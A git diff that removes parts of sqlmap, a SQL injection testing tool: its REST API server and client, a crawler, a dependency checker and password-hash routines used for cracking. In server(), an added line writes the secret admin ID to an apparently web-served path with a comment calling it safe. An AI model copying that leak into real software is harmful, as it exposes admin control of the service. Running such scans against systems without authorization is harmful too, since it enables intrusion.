response.headers["Cache-Control"] = "no-cache" - response.headers["Expires"] = "0" - if json_header: - response.content_type = "application/json; charset=UTF-8" - -############################## -# HTTP Status Code functions # -############################## - - -@return_error(401) # Access Denied -def error401(error=None): - security_headers(False) - return "Access denied" - - -@return_error(404) # Not Found -def error404(error=None): - security_headers(False) - return "Nothing here" - - -@return_error(405) # Method Not Allowed (e.g. when requesting a POST method via GET) -def error405(error=None): - security_headers(False) - return "Method not allowed" - - -@return_error(500) # Internal Server Error -def error500(error=None): - security_headers(False) - return "Internal server error" - -############################# -# Task management functions # -############################# - - -# Users' methods -@get("/task/new") -def task_new(): - """ - Create new task ID - """ - taskid = hexencode(os.urandom(8)) - remote_addr = request.remote_addr - - DataStore.tasks[taskid] = Task(taskid, remote_addr) - - logger.debug("Created new task: '%s'" % taskid) - return jsonize({"success": True, "taskid": taskid}) - - -@get("/task//delete") -def task_delete(taskid): - """ - Delete own task ID - """ - if taskid in DataStore.tasks: - DataStore.tasks.pop(taskid) - - logger.debug("[%s] Deleted task" % taskid) - return jsonize({"success": True}) - else: - logger.warning("[%s] Invalid task ID provided to task_delete()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - -################### -# Admin functions # -################### - - -@get("/admin//list") -def task_list(taskid=None): - """ - List task pull - """ - tasks = {} - - for key in DataStore.tasks: - if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: - tasks[key] = dejsonize(scan_status(key))["status"] - - logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) - return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) - -@get("/admin//flush") -def task_flush(taskid): - """ - Flush task spool (delete all tasks) - """ - - for key in list(DataStore.tasks): - if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: - DataStore.tasks[key].engine_kill() - del DataStore.tasks[key] - - logger.debug("[%s] Flushed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) - return jsonize({"success": True}) - -################################## -# sqlmap core interact functions # -################################## - - -# Handle task's options -@get("/option//list") -def option_list(taskid): - """ - List options for a certain task ID - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to option_list()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - logger.debug("[%s] Listed task options" % taskid) - return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()}) - - -@post("/option//get") -def option_get(taskid): - """ - Get the value of an option (command line switch) for a certain task ID - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to option_get()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - option = request.json.get("option", "") - - if option in DataStore.tasks[taskid].options: - logger.debug("[%s] Retrieved value for option %s" % (taskid, option)) - return jsonize({"success": True, option: DataStore.tasks[taskid].get_option(option)}) - else: - logger.debug("[%s] Requested value for unknown option %s" % (taskid, option)) - return jsonize({"success": False, "message": "Unknown option", option: "not set"}) - - -@post("/option//set") -def option_set(taskid): - """ - Set an option (command line switch) for a certain task ID - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to option_set()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - for option, value in request.json.items(): - DataStore.tasks[taskid].set_option(option, value) - - logger.debug("[%s] Requested to set options" % taskid) - return jsonize({"success": True}) - - -# Handle scans -@post("/scan//start") -def scan_start(taskid): - """ - Launch a scan - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - # Initialize sqlmap engine's options with user's provided options, if any - for option, value in request.json.items(): - DataStore.tasks[taskid].set_option(option, value) - - # Launch sqlmap engine in a separate process - DataStore.tasks[taskid].engine_start() - - logger.debug("[%s] Started scan" % taskid) - return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()}) - - -@get("/scan//stop") -def scan_stop(taskid): - """ - Stop a scan - """ - if (taskid not in DataStore.tasks or - DataStore.tasks[taskid].engine_process() is None or - DataStore.tasks[taskid].engine_has_terminated()): - logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - DataStore.tasks[taskid].engine_stop() - - logger.debug("[%s] Stopped scan" % taskid) - return jsonize({"success": True}) - - -@get("/scan//kill") -def scan_kill(taskid): - """ - Kill a scan - """ - if (taskid not in DataStore.tasks or - DataStore.tasks[taskid].engine_process() is None or - DataStore.tasks[taskid].engine_has_terminated()): - logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - DataStore.tasks[taskid].engine_kill() - - logger.debug("[%s] Killed scan" % taskid) - return jsonize({"success": True}) - - -@get("/scan//status") -def scan_status(taskid): - """ - Returns status of a scan - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - if DataStore.tasks[taskid].engine_process() is None: - status = "not running" - else: - status = "terminated" if DataStore.tasks[taskid].engine_has_terminated() is True else "running" - - logger.debug("[%s] Retrieved scan status" % taskid) - return jsonize({ - "success": True, - "status": status, - "returncode": DataStore.tasks[taskid].engine_get_returncode() - }) - - -@get("/scan//data") -def scan_data(taskid): - """ - Retrieve the data of a scan - """ - json_data_message = list() - json_errors_message = list() - - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_data()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - # Read all data from the IPC database for the taskid - for status, content_type, value in DataStore.current_db.execute( - "SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", - (taskid,)): - json_data_message.append( - {"status": status, "type": content_type, "value": dejsonize(value)}) - - # Read all error messages from the IPC database - for error in DataStore.current_db.execute( - "SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", - (taskid,)): - json_errors_message.append(error) - - logger.debug("[%s] Retrieved scan data and error messages" % taskid) - return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) - - -# Functions to handle scans' logs -@get("/scan//log//") -def scan_log_limited(taskid, start, end): - """ - Retrieve a subset of log messages - """ - json_log_messages = list() - - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - if not start.isdigit() or not end.isdigit() or end < start: - logger.warning("[%s] Invalid start or end value provided to scan_log_limited()" % taskid) - return jsonize({"success": False, "message": "Invalid start or end value, must be digits"}) - - start = max(1, int(start)) - end = max(1, int(end)) - - # Read a subset of log messages from the IPC database - for time_, level, message in DataStore.current_db.execute( - ("SELECT time, level, message FROM logs WHERE " - "taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"), - (taskid, start, end)): - json_log_messages.append({"time": time_, "level": level, "message": message}) - - logger.debug("[%s] Retrieved scan log messages subset" % taskid) - return jsonize({"success": True, "log": json_log_messages}) - - -@get("/scan//log") -def scan_log(taskid): - """ - Retrieve the log messages - """ - json_log_messages = list() - - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - # Read all log messages from the IPC database - for time_, level, message in DataStore.current_db.execute( - "SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): - json_log_messages.append({"time": time_, "level": level, "message": message}) - - logger.debug("[%s] Retrieved scan log messages" % taskid) - return jsonize({"success": True, "log": json_log_messages}) - - -# Function to handle files inside the output directory -@get("/download///") -def download(taskid, target, filename): - """ - Download a certain file from the file system - """ - if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to download()" % taskid) - return jsonize({"success": False, "message": "Invalid task ID"}) - - path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename)) - # Prevent file path traversal - if not path.startswith(paths.SQLMAP_OUTPUT_PATH): - logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) - return jsonize({"success": False, "message": "Forbidden path"}) - - if os.path.isfile(path): - logger.debug("[%s] Retrieved content of file %s" % (taskid, target)) - with open(path, 'rb') as inf: - file_content = inf.read() - return jsonize({"success": True, "file": file_content.encode("base64")}) - else: - logger.warning("[%s] File does not exist %s" % (taskid, target)) - return jsonize({"success": False, "message": "File does not exist"}) - - -def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER): - """ - REST-JSON API server - """ - DataStore.admin_id = hexencode(os.urandom(16)) - Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1] - #make adminid to known this is safe because api only avalible to local - file_object = open('/www/xseclab.com/termite/.sqlmapadminid', 'w') - file_object.write(DataStore.admin_id) - file_object.close( ) - - logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) - logger.info("Admin ID: %s" % DataStore.admin_id) - logger.debug("IPC database: %s" % Database.filepath) - - # Initialize IPC database - DataStore.current_db = Database() - DataStore.current_db.connect() - DataStore.current_db.init() - - # Run RESTful API - try: - if adapter == "gevent": - from gevent import monkey - monkey.patch_all() - elif adapter == "eventlet": - import eventlet - eventlet.monkey_patch() - logger.debug("Using adapter '%s' to run bottle" % adapter) - run(host=host, port=port, quiet=True, debug=False, server=adapter) - except socket.error, ex: - if "already in use" in getSafeExString(ex): - logger.error("Address already in use ('%s:%s')" % (host, port)) - else: - raise - except ImportError: - errMsg = "Adapter '%s' is not available on this system" % adapter - if adapter in ("gevent", "eventlet"): - errMsg += " (e.g.: 'sudo apt-get install python-%s')" % adapter - logger.critical(errMsg) - -def _client(url, options=None): - logger.debug("Calling %s" % url) - try: - data = None - if options is not None: - data = jsonize(options) - req = urllib2.Request(url, data, {'Content-Type': 'application/json'}) - response = urllib2.urlopen(req) - text = response.read() - except: - if options: - logger.error("Failed to load and parse %s" % url) - raise - return text - - -def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT): - """ - REST-JSON API client - """ - - dbgMsg = "Example client access from command line:" - dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port) - dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port) - dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) - dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/log" % (host, port) - logger.debug(dbgMsg) - - addr = "http://%s:%d" % (host, port) - logger.info("Starting REST-JSON API client to '%s'..." % addr) - - try: - _client(addr) - except Exception, ex: - if not isinstance(ex, urllib2.HTTPError): - errMsg = "There has been a problem while connecting to the " - errMsg += "REST-JSON API server at '%s' " % addr - errMsg += "(%s)" % ex - logger.critical(errMsg) - return - - taskid = None - logger.info("Type 'help' or '?' for list of available commands") - - while True: - try: - command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip().lower() - except (EOFError, KeyboardInterrupt): - print - break - - if command in ("data", "log", "status", "stop", "kill"): - if not taskid: - logger.error("No task ID in use") - continue - raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) - res = dejsonize(raw) - if not res["success"]: - logger.error("Failed to execute command %s" % command) - dataToStdout("%s\n" % raw) - - elif command.startswith("new"): - if ' ' not in command: - logger.error("Program arguments are missing") - continue - - argv = ["sqlmap.py"] + shlex.split(command)[1:] - - try: - cmdLineOptions = cmdLineParser(argv).__dict__ - except: - taskid = None - continue - - for key in list(cmdLineOptions): - if cmdLineOptions[key] is None: - del cmdLineOptions[key] - - raw = _client("%s/task/new" % addr) - res = dejsonize(raw) - if not res["success"]: - logger.error("Failed to create new task") - continue - taskid = res["taskid"] - logger.info("New task ID is '%s'" % taskid) - - raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) - res = dejsonize(raw) - if not res["success"]: - logger.error("Failed to start scan") - continue - logger.info("Scanning started") - - elif command.startswith("use"): - taskid = (command.split()[1] if ' ' in command else "").strip("'\"") - if not taskid: - logger.error("Task ID is missing") - taskid = None - continue - elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): - logger.error("Invalid task ID '%s'" % taskid) - taskid = None - continue - logger.info("Switching to task ID '%s' " % taskid) - - elif command in ("list", "flush"): - raw = _client("%s/admin/%s/%s" % (addr, taskid or 0, command)) - res = dejsonize(raw) - if not res["success"]: - logger.error("Failed to execute command %s" % command) - elif command == "flush": - taskid = None - dataToStdout("%s\n" % raw) - - elif command in ("exit", "bye", "quit", 'q'): - return - - elif command in ("help", "?"): - msg = "help Show this help message\n" - msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" - msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" - msg += "data Retrieve and show data for current task\n" - msg += "log Retrieve and show log for current task\n" - msg += "status Retrieve and show status for current task\n" - msg += "stop Stop current task\n" - msg += "kill Kill current task\n" - msg += "list Display all tasks\n" - msg += "flush Flush tasks (delete all tasks)\n" - msg += "exit Exit this client\n" - - dataToStdout(msg) - - elif command: - logger.error("Unknown command '%s'" % command) diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py deleted file mode 100644 index 7241be72..00000000 --- a/lib/utils/crawler.py +++ /dev/null @@ -1,215 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import httplib -import os -import re -import urlparse -import tempfile -import time - -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import findPageForms -from lib.core.common import getSafeExString -from lib.core.common import openFile -from lib.core.common import readInput -from lib.core.common import safeCSValue -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapSyntaxException -from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.parse.sitemap import parseSitemap -from lib.request.connect import Connect as Request -from thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup -from thirdparty.oset.pyoset import oset - -def crawl(target): - try: - visited = set() - threadData = getCurrentThreadData() - threadData.shared.value = oset() - - def crawlThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - with kb.locks.limit: - if threadData.shared.unprocessed: - current = threadData.shared.unprocessed.pop() - if current in visited: - continue - elif conf.crawlExclude and re.search(conf.crawlExclude, current): - dbgMsg = "skipping '%s'" % current - logger.debug(dbgMsg) - continue - else: - visited.add(current) - else: - break - - content = None - try: - if current: - content = Request.getPage(url=current, crawling=True, raise404=False)[0] - except SqlmapConnectionException, ex: - errMsg = "connection exception detected (%s). skipping " % ex - errMsg += "URL '%s'" % current - logger.critical(errMsg) - except SqlmapSyntaxException: - errMsg = "invalid URL detected. skipping '%s'" % current - logger.critical(errMsg) - except httplib.InvalidURL, ex: - errMsg = "invalid URL detected (%s). skipping " % ex - errMsg += "URL '%s'" % current - logger.critical(errMsg) - - if not kb.threadContinue: - break - - if isinstance(content, unicode): - try: - match = re.search(r"(?si)]*>(.+)", content) - if match: - content = "%s" % match.group(1) - - soup = BeautifulSoup(content) - tags = soup('a') - - if not tags: - tags = re.finditer(r'(?si)]+href="(?P[^>"]+)"', content) - - for tag in tags: - href = tag.get("href") if hasattr(tag, "get") else tag.group("href") - - if href: - if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: - current = threadData.lastRedirectURL[1] - url = urlparse.urljoin(current, href) - - # flag to know if we are dealing with the same target host - _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (url, target))) - - if conf.scope: - if not re.search(conf.scope, url, re.I): - continue - elif not _: - continue - - if url.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: - with kb.locks.value: - threadData.shared.deeper.add(url) - if re.search(r"(.*?)\?(.+)", url): - threadData.shared.value.add(url) - except UnicodeEncodeError: # for non-HTML files - pass - finally: - if conf.forms: - findPageForms(content, current, False, True) - - if conf.verbose in (1, 2): - threadData.shared.count += 1 - status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) - - threadData.shared.deeper = set() - threadData.shared.unprocessed = set([target]) - - if not conf.sitemapUrl: - message = "do you want to check for the existence of " - message += "site's sitemap(.xml) [y/N] " - test = readInput(message, default="n") - if test[0] in ("y", "Y"): - found = True - items = None - url = urlparse.urljoin(target, "/sitemap.xml") - try: - items = parseSitemap(url) - except SqlmapConnectionException, ex: - if "page not found" in getSafeExString(ex): - found = False - logger.warn("'sitemap.xml' not found") - except: - pass - finally: - if found: - if items: - for item in items: - if re.search(r"(.*?)\?(.+)", item): - threadData.shared.value.add(item) - if conf.crawlDepth > 1: - threadData.shared.unprocessed.update(items) - logger.info("%s links found" % ("no" if not items else len(items))) - - infoMsg = "starting crawler" - if conf.bulkFile: - infoMsg += " for target URL '%s'" % target - logger.info(infoMsg) - - for i in xrange(conf.crawlDepth): - threadData.shared.count = 0 - threadData.shared.length = len(threadData.shared.unprocessed) - numThreads = min(conf.threads, len(threadData.shared.unprocessed)) - - if not conf.bulkFile: - logger.info("searching for links with depth %d" % (i + 1)) - - runThreads(numThreads, crawlThread, threadChoice=(i>0)) - clearConsoleLine(True) - - if threadData.shared.deeper: - threadData.shared.unprocessed = set(threadData.shared.deeper) - else: - break - - except KeyboardInterrupt: - warnMsg = "user aborted during crawling. sqlmap " - warnMsg += "will use partial list" - logger.warn(warnMsg) - - finally: - clearConsoleLine(True) - - if not threadData.shared.value: - warnMsg = "no usable links found (with GET parameters)" - logger.warn(warnMsg) - else: - for url in threadData.shared.value: - kb.targets.add((url, None, None, None, None)) - - storeResultsToFile(kb.targets) - -def storeResultsToFile(results): - if not results: - return - - if kb.storeCrawlingChoice is None: - message = "do you want to store crawling results to a temporary file " - message += "for eventual further processing with other tools [y/N] " - test = readInput(message, default="N") - kb.storeCrawlingChoice = test[0] in ("y", "Y") - - if kb.storeCrawlingChoice: - handle, filename = tempfile.mkstemp(prefix="sqlmapcrawling-", suffix=".csv" if conf.forms else ".txt") - os.close(handle) - - infoMsg = "writing crawling results to a temporary file '%s' " % filename - logger.info(infoMsg) - - with openFile(filename, "w+b") as f: - if conf.forms: - f.write("URL,POST\n") - - for url, _, data, _, _ in results: - if conf.forms: - f.write("%s,%s\n" % (safeCSValue(url), safeCSValue(data or ""))) - else: - f.write("%s\n" % url) diff --git a/lib/utils/deps.py b/lib/utils/deps.py deleted file mode 100644 index cbb9787a..00000000 --- a/lib/utils/deps.py +++ /dev/null @@ -1,109 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger -from lib.core.dicts import DBMS_DICT -from lib.core.enums import DBMS -from lib.core.settings import IS_WIN - -def checkDependencies(): - missing_libraries = set() - - for dbmsName, data in DBMS_DICT.items(): - if data[1] is None: - continue - - try: - if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): - import _mssql - import pymssql - - if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": - warnMsg = "'%s' third-party library must be " % data[1] - warnMsg += "version >= 1.0.2 to work properly. " - warnMsg += "Download from %s" % data[2] - logger.warn(warnMsg) - elif dbmsName == DBMS.MYSQL: - import pymysql - elif dbmsName == DBMS.PGSQL: - import psycopg2 - elif dbmsName == DBMS.ORACLE: - import cx_Oracle - elif dbmsName == DBMS.SQLITE: - import sqlite3 - elif dbmsName == DBMS.ACCESS: - import pyodbc - elif dbmsName == DBMS.FIREBIRD: - import kinterbasdb - elif dbmsName == DBMS.DB2: - import ibm_db_dbi - elif dbmsName == DBMS.HSQLDB: - import jaydebeapi - import jpype - except ImportError: - warnMsg = "sqlmap requires '%s' third-party library " % data[1] - warnMsg += "in order to directly connect to the DBMS " - warnMsg += "%s. Download from %s" % (dbmsName, data[2]) - logger.warn(warnMsg) - missing_libraries.add(data[1]) - - continue - - debugMsg = "'%s' third-party library is found" % data[1] - logger.debug(debugMsg) - - try: - import impacket - debugMsg = "'python-impacket' third-party library is found" - logger.debug(debugMsg) - except ImportError: - warnMsg = "sqlmap requires 'python-impacket' third-party library for " - warnMsg += "out-of-band takeover feature. Download from " - warnMsg += "http://code.google.com/p/impacket/" - logger.warn(warnMsg) - missing_libraries.add('python-impacket') - - try: - import ntlm - debugMsg = "'python-ntlm' third-party library is found" - logger.debug(debugMsg) - except ImportError: - warnMsg = "sqlmap requires 'python-ntlm' third-party library " - warnMsg += "if you plan to attack a web application behind NTLM " - warnMsg += "authentication. Download from http://code.google.com/p/python-ntlm/" - logger.warn(warnMsg) - missing_libraries.add('python-ntlm') - - try: - from websocket import ABNF - debugMsg = "'python websocket-client' library is found" - logger.debug(debugMsg) - except ImportError: - warnMsg = "sqlmap requires 'websocket-client' third-party library " - warnMsg += "if you plan to attack a web application using WebSocket. " - warnMsg += "Download from https://pypi.python.org/pypi/websocket-client/" - logger.warn(warnMsg) - missing_libraries.add('websocket-client') - - if IS_WIN: - try: - import pyreadline - debugMsg = "'python-pyreadline' third-party library is found" - logger.debug(debugMsg) - except ImportError: - warnMsg = "sqlmap requires 'pyreadline' third-party library to " - warnMsg += "be able to take advantage of the sqlmap TAB " - warnMsg += "completion and history support features in the SQL " - warnMsg += "shell and OS shell. Download from " - warnMsg += "http://ipython.scipy.org/moin/PyReadline/Intro" - logger.warn(warnMsg) - missing_libraries.add('python-pyreadline') - - if len(missing_libraries) == 0: - infoMsg = "all dependencies are installed" - logger.info(infoMsg) - diff --git a/lib/utils/getch.py b/lib/utils/getch.py deleted file mode 100644 index e42fc18b..00000000 --- a/lib/utils/getch.py +++ /dev/null @@ -1,84 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -class _Getch(object): - """ - Gets a single character from standard input. Does not echo to - the screen (reference: http://code.activestate.com/recipes/134892/) - """ - def __init__(self): - try: - self.impl = _GetchWindows() - except ImportError: - try: - self.impl = _GetchMacCarbon() - except(AttributeError, ImportError): - self.impl = _GetchUnix() - - def __call__(self): - return self.impl() - - -class _GetchUnix(object): - def __init__(self): - import tty - - def __call__(self): - import sys - import termios - import tty - - fd = sys.stdin.fileno() - old_settings = termios.tcgetattr(fd) - try: - tty.setraw(sys.stdin.fileno()) - ch = sys.stdin.read(1) - finally: - termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) - return ch - - -class _GetchWindows(object): - def __init__(self): - import msvcrt - - def __call__(self): - import msvcrt - return msvcrt.getch() - - -class _GetchMacCarbon(object): - """ - A function which returns the current ASCII key that is down; - if no ASCII key is down, the null string is returned. The - page http://www.mactech.com/macintosh-c/chap02-1.html was - very helpful in figuring out how to do this. - """ - def __init__(self): - import Carbon - Carbon.Evt # see if it has this (in Unix, it doesn't) - - def __call__(self): - import Carbon - if Carbon.Evt.EventAvail(0x0008)[0] == 0: # 0x0008 is the keyDownMask - return '' - else: - # - # The event contains the following info: - # (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1] - # - # The message (msg) contains the ASCII char which is - # extracted with the 0x000000FF charCodeMask; this - # number is converted to an ASCII character with chr() and - # returned - # - (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1] - return chr(msg & 0x000000FF) - - -getch = _Getch() - diff --git a/lib/utils/hash.py b/lib/utils/hash.py deleted file mode 100644 index 8ee43253..00000000 --- a/lib/utils/hash.py +++ /dev/null @@ -1,985 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - from crypt import crypt -except ImportError: - from thirdparty.fcrypt.fcrypt import crypt - -_multiprocessing = None -try: - import multiprocessing - - # problems on FreeBSD (Reference: http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) - _ = multiprocessing.Queue() -except (ImportError, OSError): - pass -else: - try: - if multiprocessing.cpu_count() > 1: - _multiprocessing = multiprocessing - except NotImplementedError: - pass - -import gc -import os -import re -import tempfile -import time - -from hashlib import md5 -from hashlib import sha1 -from hashlib import sha224 -from hashlib import sha384 -from hashlib import sha512 -from Queue import Queue - -from lib.core.common import Backend -from lib.core.common import checkFile -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import getFileItems -from lib.core.common import getPublicTypeMembers -from lib.core.common import getSafeExString -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import normalizeUnicode -from lib.core.common import paths -from lib.core.common import readInput -from lib.core.common import singleTimeLogMessage -from lib.core.common import singleTimeWarnMessage -from lib.core.convert import hexdecode -from lib.core.convert import hexencode -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import HASH -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import COMMON_PASSWORD_SUFFIXES -from lib.core.settings import COMMON_USER_COLUMNS -from lib.core.settings import DUMMY_USER_PREFIX -from lib.core.settings import HASH_MOD_ITEM_DISPLAY -from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD -from lib.core.settings import IS_WIN -from lib.core.settings import ITOA64 -from lib.core.settings import NULL -from lib.core.settings import UNICODE_ENCODING -from lib.core.settings import ROTATING_CHARS -from lib.core.wordlist import Wordlist -from thirdparty.colorama.initialise import init as coloramainit -from thirdparty.pydes.pyDes import des -from thirdparty.pydes.pyDes import CBC - -def mysql_passwd(password, uppercase=True): - """ - Reference(s): - http://csl.sublevel3.org/mysql-password-function/ - - >>> mysql_passwd(password='testpass', uppercase=True) - '*00E247AC5F9AF26AE0194B41E1E769DEE1429A29' - """ - - retVal = "*%s" % sha1(sha1(password).digest()).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def mysql_old_passwd(password, uppercase=True): # prior to version '4.1' - """ - Reference(s): - http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c - http://voidnetwork.org/5ynL0rd/darkc0de/python_script/darkMySQLi.html - - >>> mysql_old_passwd(password='testpass', uppercase=True) - '7DCDA0D57290B453' - """ - - a, b, c = 1345345333, 7, 0x12345671 - - for d in password: - if d == ' ' or d == '\t': - continue - - e = ord(d) - a ^= (((a & 63) + b) * e) + (a << 8) - c += (c << 8) ^ a - b += e - - retVal = "%08lx%08lx" % (a & ((1 << 31) - 1), c & ((1 << 31) - 1)) - - return retVal.upper() if uppercase else retVal.lower() - -def postgres_passwd(password, username, uppercase=False): - """ - Reference(s): - http://pentestmonkey.net/blog/cracking-postgres-hashes/ - - >>> postgres_passwd(password='testpass', username='testuser', uppercase=False) - 'md599e5ea7a6f7c3269995cba3927fd0093' - """ - - - if isinstance(username, unicode): - username = unicode.encode(username, UNICODE_ENCODING) - - if isinstance(password, unicode): - password = unicode.encode(password, UNICODE_ENCODING) - - retVal = "md5%s" % md5(password + username).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def mssql_passwd(password, salt, uppercase=False): - """ - Reference(s): - http://www.leidecker.info/projects/phrasendrescher/mssql.c - https://www.evilfingers.com/tools/GSAuditor.php - - >>> mssql_passwd(password='testpass', salt='4086ceb6', uppercase=False) - '0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a' - """ - - binsalt = hexdecode(salt) - unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) - - retVal = "0100%s%s" % (salt, sha1(unistr + binsalt).hexdigest()) - - return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) - -def mssql_old_passwd(password, salt, uppercase=True): # prior to version '2005' - """ - Reference(s): - www.exploit-db.com/download_pdf/15537/ - http://www.leidecker.info/projects/phrasendrescher/mssql.c - https://www.evilfingers.com/tools/GSAuditor.php - - >>> mssql_old_passwd(password='testpass', salt='4086ceb6', uppercase=True) - '0x01004086CEB60C90646A8AB9889FE3ED8E5C150B5460ECE8425AC7BB7255C0C81D79AA5D0E93D4BB077FB9A51DA0' - """ - - binsalt = hexdecode(salt) - unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) - - retVal = "0100%s%s%s" % (salt, sha1(unistr + binsalt).hexdigest(), sha1(unistr.upper() + binsalt).hexdigest()) - - return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) - -def mssql_new_passwd(password, salt, uppercase=False): - """ - Reference(s): - http://hashcat.net/forum/thread-1474.html - - >>> mssql_new_passwd(password='testpass', salt='4086ceb6', uppercase=False) - '0x02004086ceb6eb051cdbc5bdae68ffc66c918d4977e592f6bdfc2b444a7214f71fa31c35902c5b7ae773ed5f4c50676d329120ace32ee6bc81c24f70711eb0fc6400e85ebf25' - """ - - binsalt = hexdecode(salt) - unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) - - retVal = "0200%s%s" % (salt, sha512(unistr + binsalt).hexdigest()) - - return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) - -def oracle_passwd(password, salt, uppercase=True): - """ - Reference(s): - https://www.evilfingers.com/tools/GSAuditor.php - 